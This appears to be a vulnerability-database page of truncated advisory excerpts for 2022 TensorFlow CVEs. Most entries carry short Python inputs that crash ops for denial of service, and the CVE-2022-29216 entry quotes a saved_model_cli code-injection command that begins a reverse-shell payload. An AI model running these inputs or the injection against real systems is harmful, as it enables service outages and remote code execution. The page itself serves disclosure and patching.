Intel Optimization For Tensorflow vulnerabilities

CVE-2022-35989 [MEDIUM] CWE-617 TensorFlow vulnerable to `CHECK` fail in `MaxPool` TensorFlow vulnerable to `CHECK` fail in `MaxPool` ### Impact When `MaxPool` receives a window size input array `ksize` with dimensions greater than its input tensor `input`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf import numpy as np input = np.ones([1, 1, 1, 1]) ksize = [1, 1, 2, 2] strides = [1, 1, 1, 1] padding = 'VALID' dat

CVE-2022-36011 [MEDIUM] CWE-476 TensorFlow vulnerable to null dereference on MLIR on empty function attributes TensorFlow vulnerable to null dereference on MLIR on empty function attributes ### Impact When [`mlir::tfg::ConvertGenericFunctionToFunctionDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/functiondef_import.cc) is given empty function attributes, it gives a null dereference. ```cpp // Import the function attributes with a `tf.` prefix to match

CVE-2022-35967 [MEDIUM] CWE-20 TensorFlow vulnerable to segfault in `QuantizedAdd` TensorFlow vulnerable to segfault in `QuantizedAdd` ### Impact If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf Toutput = tf.qint32 x = tf.constant(140, shape=[1], dtype=tf.quint8) y = tf.constant(26, shape=[10], dtype=tf.quint8) min_x = tf.constant([], shape=[0], dty

CVE-2022-35974 [MEDIUM] CWE-20 TensorFlow vulnerable to segfault in `QuantizeDownAndShrinkRange` TensorFlow vulnerable to segfault in `QuantizeDownAndShrinkRange` ### Impact If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.quint8 input = tf.constant([1], shape=[3], dtype=tf.qint32) input_min = tf.constant([], shape=[0], dtype=

CVE-2022-35965 [MEDIUM] CWE-476 TensorFlow vulnerable to segfault in `LowerBound` and `UpperBound` TensorFlow vulnerable to segfault in `LowerBound` and `UpperBound` ### Impact If `LowerBound` or `UpperBound` is given an empty`sorted_inputs` input, it results in a `nullptr` dereference, leading to a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.int32 sorted_inputs = tf.constant([], shape=[10,0], dtype=tf.float32) values = tf.co

CVE-2022-35998 [MEDIUM] CWE-617 TensorFlow vulnerable to `CHECK` fail in `EmptyTensorList` TensorFlow vulnerable to `CHECK` fail in `EmptyTensorList` ### Impact If `EmptyTensorList` receives an input `element_shape` with more than one dimension, it gives a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf tf.raw_ops.EmptyTensorList(element_shape=tf.ones(dtype=tf.int32, shape=[1, 0]), max_num_elements=tf.constant(1),element_dtype=tf.int32) ``

CVE-2022-36015 [LOW] CWE-190 TensorFlow vulnerable to integer overflow in math ops TensorFlow vulnerable to integer overflow in math ops ### Impact When [`RangeSize`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/math_ops.cc) receives values that do not fit into an `int64_t`, it crashes. ```cpp auto size = (std::is_integral::value ? ((Eigen::numext::abs(limit - start) + Eigen::numext::abs(delta) - T(1)) / Eigen::numext::abs(delta)) : (Eigen::numext::ceil( Eigen::numex

CVE-2022-36016 [LOW] CWE-617 TensorFlow vulnerable to `CHECK`-fail in `tensorflow::full_type::SubstituteFromAttrs` TensorFlow vulnerable to `CHECK`-fail in `tensorflow::full_type::SubstituteFromAttrs` ### Impact When [`tensorflow::full_type::SubstituteFromAttrs`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/math_ops.cc) receives a `FullTypeDef& t` that is not exactly three args, it triggers a `CHECK`-fail instead of returning a status. ```cpp Status SubstituteForEach

CVE-2022-29216 [HIGH] CWE-94 Code injection in `saved_model_cli` in TensorFlow Code injection in `saved_model_cli` in TensorFlow ### Impact TensorFlow's `saved_model_cli` tool is vulnerable to a code injection: ``` saved_model_cli run --input_exprs 'x=print("malicious code to run")' --dir ./ --tag_set serve --signature_def serving_default ``` This can be used to open a reverse shell ``` saved_model_cli run --input_exprs 'hello=exec("""\nimport socket\nimport subprocess\ns=socket.socket(socke

CVE-2022-29208 [HIGH] CWE-787 Segfault and OOB write due to incomplete validation in `EditDistance` in TensorFlow Segfault and OOB write due to incomplete validation in `EditDistance` in TensorFlow ### Impact The implementation of [`tf.raw_ops.EditDistance`]() has incomplete validation. Users can pass negative values to cause a segmentation fault based denial of service: ```python import tensorflow as tf hypothesis_indices = tf.constant(-1250999896764, shape=[3, 3], dtype=tf.int64) hypothesis

CVE-2022-29204 [MEDIUM] CWE-191 Missing validation causes denial of service via `Conv3DBackpropFilterV2` Missing validation causes denial of service via `Conv3DBackpropFilterV2` ### Impact The implementation of [`tf.raw_ops.UnsortedSegmentJoin`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/unsorted_segment_join_op.cc#L83-L148) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trig

CVE-2022-29191 [MEDIUM] CWE-20 Missing validation causes denial of service via `GetSessionTensor` Missing validation causes denial of service via `GetSessionTensor` ### Impact The implementation of [`tf.raw_ops.GetSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L94-L112) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attac

CVE-2022-29212 [MEDIUM] CWE-20 Core dump when loading TFLite models with quantization in TensorFlow Core dump when loading TFLite models with quantization in TensorFlow ### Impact Certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling [`QuantizeMultiplierSmallerThanOneExp`

CVE-2022-29203 [MEDIUM] CWE-190 Integer overflow in `SpaceToBatchND` Integer overflow in `SpaceToBatchND` ### Impact The implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: ```python import tensorflow as tf input = tf.constant(-3.5e+35, shape=[10,19,22], dtype=tf.float32) block_shape = tf.constant(-1879048192, shape=[2], dtype=tf.int64) paddings = tf.constant(0, shape=[2,2], dtype=tf.int32) tf.raw_ops.SpaceT

CVE-2022-29209 [MEDIUM] CWE-843 Type confusion leading to `CHECK`-failure based denial of service in TensorFlow Type confusion leading to `CHECK`-failure based denial of service in TensorFlow ### Impact The [macros that TensorFlow uses for writing assertions (e.g., `CHECK_LT`, `CHECK_GT`, etc.)](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/platform/default/logging.h) have an incorrect logic when comparing `size_t` and `int` values. Due t

CVE-2022-29213 [MEDIUM] CWE-20 Incomplete validation in signal ops leads to crashes in TensorFlow Incomplete validation in signal ops leads to crashes in TensorFlow ### Impact The `tf.compat.v1.signal.rfft2d` and `tf.compat.v1.signal.rfft3d` lack input validation and under certain condition can result in crashes (due to `CHECK`-failures). ### Patches We have patched the issue in GitHub commit [0a8a781e597b18ead006d19b7d23d0a369e9ad73](https://github.com/tensorflow/tensorflow/commit/0a8a781e597

CVE-2022-29206 [MEDIUM] CWE-20 Missing validation results in undefined behavior in `SparseTensorDenseAdd Missing validation results in undefined behavior in `SparseTensorDenseAdd ### Impact The implementation of [`tf.raw_ops.SparseTensorDenseAdd`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse_tensor_dense_add_op.cc) does not fully validate the input arguments: ```python import tensorflow as tf a_indices = tf.constant(0, s

CVE-2022-29194 [MEDIUM] CWE-20 Missing validation causes denial of service via `DeleteSessionTensor` Missing validation causes denial of service via `DeleteSessionTensor` ### Impact The implementation of [`tf.raw_ops.DeleteSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L128-L144) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of ser

CVE-2022-29193 [MEDIUM] CWE-20 Missing validation causes `TensorSummaryV2` to crash Missing validation causes `TensorSummaryV2` to crash ### Impact The implementation of [`tf.raw_ops.TensorSummaryV2`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/summary_tensor_op.cc#L33-L58) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import num

CVE-2022-29205 [MEDIUM] CWE-476 Segfault due to missing support for quantized types Segfault due to missing support for quantized types ### Impact There is a potential for segfault / denial of service in TensorFlow by calling `tf.compat.v1.*` ops which don't yet have support for quantized types (added after migration to TF 2.x): ```python import numpy as np import tensorflow as tf tf.compat.v1.placeholder_with_default(input=np.array([2]),shape=tf.constant(dtype=tf.qint8, value=np.array([1])))